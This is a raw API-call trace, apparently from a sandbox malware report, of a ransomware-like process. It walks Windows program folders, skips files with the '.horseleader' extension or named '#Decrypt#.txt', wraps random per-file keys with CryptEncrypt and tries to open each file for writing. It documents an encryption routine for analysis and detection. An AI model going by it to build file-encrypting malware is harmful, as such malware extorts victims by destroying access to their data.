lstrcmpW (lpString1="Circle_SelectionSubpictureB.png", lpString2="_uninstalling_.png") returned 1 [0251.482] lstrlenW (lpString=".testttjffg") returned 11 [0251.482] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png", lpSrch=".testttjffg") returned 0x0 [0251.482] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.482] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.482] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpictureb.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.484] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee2d70a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee2d70a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9679c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13c3, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Circle_VideoInset.png", cAlternateFileName="")) returned 1 [0251.484] lstrcmpiW (lpString1="Circle_VideoInset.png", lpString2="Windows") returned -1 [0251.484] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png") returned 69 [0251.484] StrStrIW (lpFirst="Circle_VideoInset.png", lpSrch=".horseleader") returned 0x0 [0251.484] lstrcmpW (lpString1="Circle_VideoInset.png", lpString2="#Decrypt#.txt") returned 1 [0251.484] lstrcmpW (lpString1="Circle_VideoInset.png", lpString2="_uninstalling_.png") returned 1 [0251.484] lstrlenW (lpString=".testttjffg") returned 11 [0251.484] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png", lpSrch=".testttjffg") returned 0x0 [0251.484] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.484] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, 
Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.485] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.485] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea030de, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea030de, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9fff39, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="cloud_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.485] lstrcmpiW (lpString1="cloud_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.485] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp") returned 67 [0251.485] StrStrIW (lpFirst="cloud_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.485] lstrcmpW (lpString1="cloud_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.485] lstrcmpW (lpString1="cloud_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.485] lstrlenW (lpString=".testttjffg") returned 11 [0251.485] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.486] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.486] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.486] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\cloud_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.486] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee2d70a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee2d70a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9fff39, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5c9f, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Dot.png", cAlternateFileName="")) returned 1 [0251.486] lstrcmpiW (lpString1="Dot.png", lpString2="Windows") returned -1 [0251.486] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png") returned 55 [0251.486] StrStrIW (lpFirst="Dot.png", lpSrch=".horseleader") returned 0x0 [0251.486] lstrcmpW (lpString1="Dot.png", lpString2="#Decrypt#.txt") returned 1 [0251.487] lstrcmpW (lpString1="Dot.png", lpString2="_uninstalling_.png") returned 1 [0251.487] lstrlenW (lpString=".testttjffg") returned 11 [0251.487] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png", lpSrch=".testttjffg") returned 0x0 [0251.487] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.487] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) 
returned 1 [0251.487] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.487] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee799c4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee799c4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4cb30a29, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x422c, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="DvdTransform.fx", cAlternateFileName="")) returned 1 [0251.487] lstrcmpiW (lpString1="DvdTransform.fx", lpString2="Windows") returned -1 [0251.487] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx") returned 63 [0251.488] StrStrIW (lpFirst="DvdTransform.fx", lpSrch=".horseleader") returned 0x0 [0251.488] lstrcmpW (lpString1="DvdTransform.fx", lpString2="#Decrypt#.txt") returned 1 [0251.488] lstrcmpW (lpString1="DvdTransform.fx", lpString2="_uninstalling_.png") returned 1 [0251.488] lstrlenW (lpString=".testttjffg") returned 11 [0251.488] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx", lpSrch=".testttjffg") returned 0x0 [0251.488] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.488] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.488] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\DvdTransform.fx" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dvdtransform.fx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.488] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f43efc8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f465237, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FlipPage", cAlternateFileName="")) returned 1 [0251.488] lstrcmpiW (lpString1="FlipPage", lpString2="Windows") returned -1 [0251.489] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned 56 [0251.489] lstrcmpW (lpString1="FlipPage", lpString2=".") returned 1 [0251.489] lstrcmpW (lpString1="FlipPage", lpString2="..") returned 1 [0251.489] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.489] GetProcessHeap () returned 0x780000 [0251.489] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.489] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\*") returned 58 [0251.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f43efc8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, 
ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f465237, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.493] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.494] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\.") returned 58 [0251.494] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.494] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f43efc8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f465237, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.494] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.494] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\..") returned 59 [0251.494] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.494] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.494] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe188e9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fe188e9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d019747, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 
[0251.494] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.494] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png") returned 74 [0251.494] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.494] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.495] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.495] lstrlenW (lpString=".testttjffg") returned 11 [0251.495] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.495] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.495] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.495] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.496] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe3ea46, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fe3ea46, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d019747, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0251.496] 
lstrcmpiW (lpString1="203x8subpicture.png", lpString2="Windows") returned -1 [0251.497] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png") returned 76 [0251.497] StrStrIW (lpFirst="203x8subpicture.png", lpSrch=".horseleader") returned 0x0 [0251.497] lstrcmpW (lpString1="203x8subpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.497] lstrcmpW (lpString1="203x8subpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.497] lstrlenW (lpString=".testttjffg") returned 11 [0251.497] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.497] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.497] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.497] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.498] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fed6fba, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fed6fba, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d019747, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) 
returned 1 [0251.498] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.498] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png") returned 89 [0251.498] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.499] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.499] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.499] lstrlenW (lpString=".testttjffg") returned 11 [0251.499] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.499] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.499] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.499] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.500] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6feb0e5d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6feb0e5d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d019747, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, 
nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.500] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.500] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned 95 [0251.500] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.500] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.500] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.500] lstrlenW (lpString=".testttjffg") returned 11 [0251.500] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.500] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.500] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.501] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6feb0e5d, ftCreationTime.dwHighDateTime=0x1ca03fb, 
ftLastAccessTime.dwLowDateTime=0x6feb0e5d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.501] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.501] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png") returned 90 [0251.501] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.501] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.501] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.501] lstrlenW (lpString=".testttjffg") returned 11 [0251.501] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.502] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.502] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.502] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.502] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: 
lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe64ba3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fe64ba3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.503] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.503] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png") returned 96 [0251.503] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.503] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.503] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.503] lstrlenW (lpString=".testttjffg") returned 11 [0251.503] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.503] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.503] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.503] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
